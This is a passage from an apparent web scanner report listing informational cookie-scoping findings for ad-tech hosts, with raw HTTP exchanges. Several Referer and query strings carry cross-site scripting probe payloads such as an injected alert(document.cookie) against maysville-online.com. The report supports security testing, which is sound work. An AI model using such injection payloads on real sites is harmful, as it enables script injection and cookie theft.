Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ar_p87077372=exp=1&initExp=Tue May 3 15:42:18 2011&recExp=Tue May 3 15:42:18 2011&prad=124094&arc=184537%3F684451&; expires=Mon 01-Aug-2011 15:42:18 GMT; path=/; domain=.voicefive.com;
BMX_G=method->-1,ts->1304437338; path=/; domain=.voicefive.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bmx3/broker.pli?pid=p87077372&PRAd=124094&AR_C=184537?684451 HTTP/1.1
Host: ar.voicefive.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.specificmedia.com/serve/v=5;m=3;l=8610;c=143917;b=856866;ts=20110503114210;cxt=811200901:2280462

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 03 May 2011 15:42:18 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p87077372=exp=1&initExp=Tue May 3 15:42:18 2011&recExp=Tue May 3 15:42:18 2011&prad=124094&arc=184537%3F684451&; expires=Mon 01-Aug-2011 15:42:18 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304437338; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 24816

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"124094",Pid:"p87077372",Arc:"184537?684451",Location
...[SNIP]...

12.20. http://as.casalemedia.com/j previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://as.casalemedia.com
Path:	/j

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CMID=.uYdh63LtckAAAy9QKIAAABX;domain=casalemedia.com;path=/;expires=Wed, 02 May 2012 15:41:57 GMT
CMST=TcAiRU3AIkUB;domain=casalemedia.com;path=/;expires=Wed, 04 May 2011 15:41:57 GMT
CMSC=TcAiRQ**;domain=casalemedia.com;path=/;
CMDD=AAHcNgE*;domain=casalemedia.com;path=/;expires=Wed, 04 May 2011 15:41:57 GMT
CMD4=AAE5fk3AIkUAAdw2AALYXgEBAA**;domain=casalemedia.com;path=/;expires=Thu, 02 Jun 2011 15:41:57 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /j?s=121910&u=http%3A%2F%2Fwww.maysville-online.com%2Fcontent%2F%3Fc3a2e%2522-alert(%2522DORK%2522)-%2522f8cf8d87874%3D1&a=4&id=54048766&p=0&v=2&inif=0&l=671&t=402&w=1920&h=1156&z=300&r=http%3A%2F%2Fburp%2Fshow%2F2&C=1 HTTP/1.1
Host: as.casalemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1
Cookie: CMID=.uYdh63LtckAAAy9QKIAAABX; CMPS=061; CMPP=006

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/javascript
Expires: Tue, 03 May 2011 15:41:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 15:41:57 GMT
Content-Length: 475
Connection: close
Set-Cookie: CMID=.uYdh63LtckAAAy9QKIAAABX;domain=casalemedia.com;path=/;expires=Wed, 02 May 2012 15:41:57 GMT
Set-Cookie: CMPS=061;domain=casalemedia.com;path=/;expires=Mon, 01 Aug 2011 15:41:57 GMT
Set-Cookie: CMPP=006;domain=casalemedia.com;path=/;expires=Mon, 01 Aug 2011 15:41:57 GMT
Set-Cookie: CMST=TcAiRU3AIkUB;domain=casalemedia.com;path=/;expires=Wed, 04 May 2011 15:41:57 GMT
Set-Cookie: CMSC=TcAiRQ**;domain=casalemedia.com;path=/;
Set-Cookie: CMDD=AAHcNgE*;domain=casalemedia.com;path=/;expires=Wed, 04 May 2011 15:41:57 GMT
Set-Cookie: CMD4=AAE5fk3AIkUAAdw2AALYXgEBAA**;domain=casalemedia.com;path=/;expires=Thu, 02 Jun 2011 15:41:57 GMT

document.write('<iframe id="cmif4-3042152914" src="http://cdn.optmd.com/blank.html" width="300" height="250" marginwidth="0" marginheight="0" frameborder="0" scrolling="no" allowtransparency="true" on
...[SNIP]...

12.21. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=7278cea-24.143.206.58-1297260492; expires=Thu, 02-May-2013 15:41:33 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=8&c2=2102&rn=1498637523&c7=http%3A%2F%2Fd3.zedo.com%2Fjsc%2Fd3%2Fff2.html%3Fn%3D1190%3Bc%3D1%3Bs%3D1%3Bd%3D9%3Bw%3D300%3Bh%3D250%3B%24%3Daudiencescience300x250&c3=0&c4=54012&c9=http%3A%2F%2Fwww.maysville-online.com%2Ffavicon.ico%3Fbe4e4%2522-alert(1)-%2522ccebc516c28%3D1&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250
Cookie: UID=7278cea-24.143.206.58-1297260492

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Tue, 03 May 2011 15:41:33 GMT
Connection: close
Set-Cookie: UID=7278cea-24.143.206.58-1297260492; expires=Thu, 02-May-2013 15:41:33 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

12.22. http://b.voicefive.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=3e0cd3b-72.246.30.17-1304437355; expires=Thu, 02-May-2013 15:42:35 GMT; path=/; domain=.voicefive.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p87077372&c3=124094&c4=184537%3F684451&c5=1&c6=1&c7=Tue%20May%20%203%2015%3A42%3A17%202011&c8=http%3A%2F%2Fads.specificmedia.com%2Fserve%2Fv%3D5%3Bm%3D3%3Bl%3D8610%3Bc%3D143917%3Bb%3D856866%3Bts%3D20110503114210%3Bcxt%3D811200901%3A2280462&c9=Advert&c10=http%3A%2F%2Fwww.maysville-online.com%2Fcontent%2F%3Fc3a2e%2522-alert(%2522DORK%2522)-%2522f8cf8d87874%3D1&c15=&1304455353873 HTTP/1.1
Host: b.voicefive.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.specificmedia.com/serve/v=5;m=3;l=8610;c=143917;b=856866;ts=20110503114210;cxt=811200901:2280462
Cookie: ar_p87077372=exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&; BMX_G=method->-1,ts->1304437337; BMX_3PC=1

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://b.voicefive.com/b2?c1=4&c2=p87077372&c3=124094&c4=184537%3F684451&c5=1&c6=1&c7=Tue%20May%20%203%2015%3A42%3A17%202011&c8=http%3A%2F%2Fads.specificmedia.com%2Fserve%2Fv%3D5%3Bm%3D3%3Bl%3D8610%3Bc%3D143917%3Bb%3D856866%3Bts%3D20110503114210%3Bcxt%3D811200901%3A2280462&c9=Advert&c10=http%3A%2F%2Fwww.maysville-online.com%2Fcontent%2F%3Fc3a2e%2522-alert(%2522DORK%2522)-%2522f8cf8d87874%3D1&c15=&1304455353873
Date: Tue, 03 May 2011 15:42:35 GMT
Connection: close
Set-Cookie: UID=3e0cd3b-72.246.30.17-1304437355; expires=Thu, 02-May-2013 15:42:35 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

12.23. http://bh.contextweb.com/bh/rtset previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/bh/rtset

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

V=RiC6i2pCL3Ub; Domain=.contextweb.com; Expires=Fri, 27-Apr-2012 15:41:31 GMT; Path=/
pb_rtb_ev=1:531292.AA-00000001931708427.0; Domain=.contextweb.com; Expires=Wed, 02-May-2012 15:41:31 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=531292&ev=AA-00000001931708427 HTTP/1.1
Host: bh.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250
Cookie: C2W4=CT-USR; cw=cw; V=RiC6i2pCL3Ub; FC1-WC=^54012_1_2R5ws; FC1-WCR=^108044_1_2R5ws; CDSActionTracking6=gDLdEnJ4dUI3|RiC6i2pCL3Ub|503597|2587|5273|54012|108044|94417|3|0|0|maysville-online.com|2|8|1|0|2|1|2||1|0|PEiOeaHGRLH4quYZj5mgESimscR103Gq|I|2QJ2U|31Blm; vf=1

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
CW-Server: cw-web80
Cache-Control: no-cache, no-store
Set-Cookie: V=RiC6i2pCL3Ub; Domain=.contextweb.com; Expires=Fri, 27-Apr-2012 15:41:31 GMT; Path=/
Set-Cookie: pb_rtb_ev=1:531292.AA-00000001931708427.0; Domain=.contextweb.com; Expires=Wed, 02-May-2012 15:41:31 GMT; Path=/
Content-Type: image/gif
Date: Tue, 03 May 2011 15:41:30 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

12.24. http://cms.quantserve.com/dpixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cms.quantserve.com
Path:	/dpixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

d=ENgBDAHUBoEAlw; expires=Mon, 01-Aug-2011 15:42:40 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dpixel?eid=0&id=CAESEBHuG4NIXIkDS6XoHpAqKz8&cver=1 HTTP/1.1
Host: cms.quantserve.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1
Cookie: mc=4d529fca-2c7e4-2f739-1ba49; d=ENgBDAHUBoGXAA

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=ENgBDAHUBoEAlw; expires=Mon, 01-Aug-2011 15:42:40 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Content-Type: image/gif
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Tue, 03 May 2011 15:42:40 GMT
Server: QS

GIF89a.......,.................D..;

12.25. http://cw-m.d.chango.com/m/cw previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cw-m.d.chango.com
Path:	/m/cw

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_t=d1f7cae6-759b-11e0-b4f3-00259031f86c; Domain=chango.com; expires=Fri, 30 Apr 2021 15:41:32 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m/cw HTTP/1.1
Host: cw-m.d.chango.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: Chango RTB Server
Location: http://bh.contextweb.com/bh/rtset?do=add&ev=d1f7cae6-759b-11e0-b4f3-00259031f86c&pid=535495&rurl=http%3A//d.chango.com/m/s/contextweb&x=2011-06-17
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Set-Cookie: _t=d1f7cae6-759b-11e0-b4f3-00259031f86c; Domain=chango.com; expires=Fri, 30 Apr 2021 15:41:32 GMT; Path=/
Set-Cookie: _i_cw=1; Domain=chango.com; expires=Fri, 17 Jun 2011 15:41:32 GMT; Path=/
Connection: close

12.26. http://d.xp1.ru4.com/activity previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.xp1.ru4.com
Path:	/activity

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

X1ID=AG-00000001217181099; domain=.ru4.com; path=/; expires=Tue, 03-Nov-2012 11:41:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /activity?_o=62795&_t=cm_cntxtweb HTTP/1.1
Host: d.xp1.ru4.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Tue, 03 May 2011 15:41:30 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Connection: close
Pragma: no-cache
Set-cookie: X1ID=AG-00000001217181099; domain=.ru4.com; path=/; expires=Tue, 03-Nov-2012 11:41:30 GMT
Set-cookie: O62795=0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-1970 12:00:00 GMT
Location: http://bh.contextweb.com/bh/rtset?do=add&pid=531292&ev=AG-00000001217181099
Content-length: 0

12.27. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-405/d3/jsc/fm.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

FFpb=1190:audiencescience300x250;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=1190,2,9:933,56,15:826,276,9:1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFad=0:1:0:2;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFChanCap=1583B1190,1#675962#675816#812963,2#894866|0,1,1:0,1,1:0,1,1:0,1,1;expires=Thu, 02 Jun 2011 15:41:54 GMT;path=/;domain=.zedo.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=2/1&a=0&f=&n=1190&r=5&d=9&q=&$=&s=1&z=0.05692060776185648 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1
Cookie: ZCBC=1; FFgeo=2241452; FFcat=933,56,15:826,276,9:1190,1,9; FFad=1:0:2; FFChanCap=1583B1190,1#675962#675816#812963|0,1,1:0,1,1:0,1,1; ZEDOIDX=21; aps=2; FFpb=1190:audiencescience300x250; ZEDOIDA=@HD0VAoBADQAAGbr14QAAAAA~050311; FFCap=1583B933,196008,139660|0,1,1:0,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:audiencescience300x250;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1190,2,9:933,56,15:826,276,9:1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:1:0:2;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675962#675816#812963,2#894866|0,1,1:0,1,1:0,1,1:0,1,1;expires=Thu, 02 Jun 2011 15:41:54 GMT;path=/;domain=.zedo.com;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 1634247266 1634246238
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=80
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:41:54 GMT
Connection: close
Content-Length: 2291

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='audiencesc
...[SNIP]...

12.28. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-405/d3/jsc/fmr.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

FFgeo=2241452;expires=Wed, 02 May 2012 15:40:45 GMT;domain=.zedo.com;path=/;
FFcat=1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFChanCap=1583B1190,1#675962|0,1,1;expires=Thu, 02 Jun 2011 15:40:45 GMT;path=/;domain=.zedo.com;
ZEDOIDA=-SHATcGt89bdPdY10luzTKFT~050311;expires=Fri, 30 Apr 2021 15:40:45 GMT;domain=.zedo.com;path=/;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-405/d3/jsc/fmr.js?c=1&a=0&f=&n=1190&r=5&d=9&q=&$=&s=1&z=0.9079998980845427 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1
Cookie: ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFgeo=2241452;expires=Wed, 02 May 2012 15:40:45 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675962|0,1,1;expires=Thu, 02 Jun 2011 15:40:45 GMT;path=/;domain=.zedo.com;
Set-Cookie: ZEDOIDA=-SHATcGt89bdPdY10luzTKFT~050311;expires=Fri, 30 Apr 2021 15:40:45 GMT;domain=.zedo.com;path=/;
ETag: "19b86ed-8181-4a12b03c8ce80"
Vary: Accept-Encoding
X-Varnish: 920079178 920078218
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=149
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:40:45 GMT
Connection: close
Content-Length: 2830

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='';var zzCus
...[SNIP]...

12.29. http://d7.zedo.com/bar/v16-405/d3/jsc/gl.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-405/d3/jsc/gl.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

FFgeo=2241452;expires=Wed, 02 May 2012 15:41:11 GMT;domain=.zedo.com;path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bar/v16-405/d3/jsc/gl.js HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250
Cookie: ZCBC=1; FFgeo=2241452; FFcat=1190,1,9; FFad=1; FFChanCap=1583B1190,1#675962#675816|0,1,1:0,1,1; ZEDOIDA=-SHATcGt89Z6bBFZFIn3XV-r~050311; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 399
Content-Type: application/x-javascript
Set-Cookie: FFgeo=2241452;expires=Wed, 02 May 2012 15:41:11 GMT;domain=.zedo.com;path=/;
ETag: "19b86f9-5d7-4a12b049e6e00"
Vary: Accept-Encoding
X-Varnish: 1634248064 1634246683
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=325963
Expires: Sat, 07 May 2011 10:13:54 GMT
Date: Tue, 03 May 2011 15:41:11 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var zzl='en-us';

if(typeof zzGeo=='undefined'){
var zzGeo=254;}
if(typeof zzCountry=='undefined'){
var zzCountry=255;}
if(typeof
...[SNIP]...

12.30. http://h.zedo.com/init/0.20843081758144966/g.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://h.zedo.com
Path:	/init/0.20843081758144966/g.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

FFgeo=2241452; path=/; EXPIRES=Wed, 02-May-12 15:41:15 GMT; DOMAIN=.zedo.com
ZEDOIDA=@HD0VAoBADQAAGbr14QAAAAA~050311; path=/; expires=Fri, 30-Apr-21 15:41:15 GMT; domain=.zedo.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /init/0.20843081758144966/g.gif HTTP/1.1
Host: h.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250
Cookie: ZCBC=1; FFgeo=2241452; FFcat=933,56,15:1190,1,9; FFad=0:2; FFChanCap=1583B1190,1#675962#675816|0,1,1:0,1,1; ZEDOIDX=21; aps=1; FFpb=1190:audiencescience300x250

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:41:15 GMT
Server: ZEDO 3G
Set-Cookie: FFgeo=2241452; path=/; EXPIRES=Wed, 02-May-12 15:41:15 GMT; DOMAIN=.zedo.com
Set-Cookie: ZEDOIDA=@HD0VAoBADQAAGbr14QAAAAA~050311; path=/; expires=Fri, 30-Apr-21 15:41:15 GMT; domain=.zedo.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Length: 42
Expires: -1
Pragma: no-cache
Cache-Control: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

12.31. http://h.zedo.com/init/0.7280766281441555/g.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://h.zedo.com
Path:	/init/0.7280766281441555/g.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

FFgeo=2241452; path=/; EXPIRES=Wed, 02-May-12 15:41:15 GMT; DOMAIN=.zedo.com
ZEDOIDA=@G7EzAoBADQAAGbr14EAAAAF~050311; path=/; expires=Fri, 30-Apr-21 15:41:15 GMT; domain=.zedo.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /init/0.7280766281441555/g.gif HTTP/1.1
Host: h.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1190
Cookie: ZCBC=1; FFgeo=2241452; FFcat=933,56,15:1190,1,9; FFad=0:2; FFChanCap=1583B1190,1#675962#675816|0,1,1:0,1,1; ZEDOIDX=21; aps=1; FFpb=1190:audiencescience300x250

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:41:15 GMT
Server: ZEDO 3G
Set-Cookie: FFgeo=2241452; path=/; EXPIRES=Wed, 02-May-12 15:41:15 GMT; DOMAIN=.zedo.com
Set-Cookie: ZEDOIDA=@G7EzAoBADQAAGbr14EAAAAF~050311; path=/; expires=Fri, 30-Apr-21 15:41:15 GMT; domain=.zedo.com
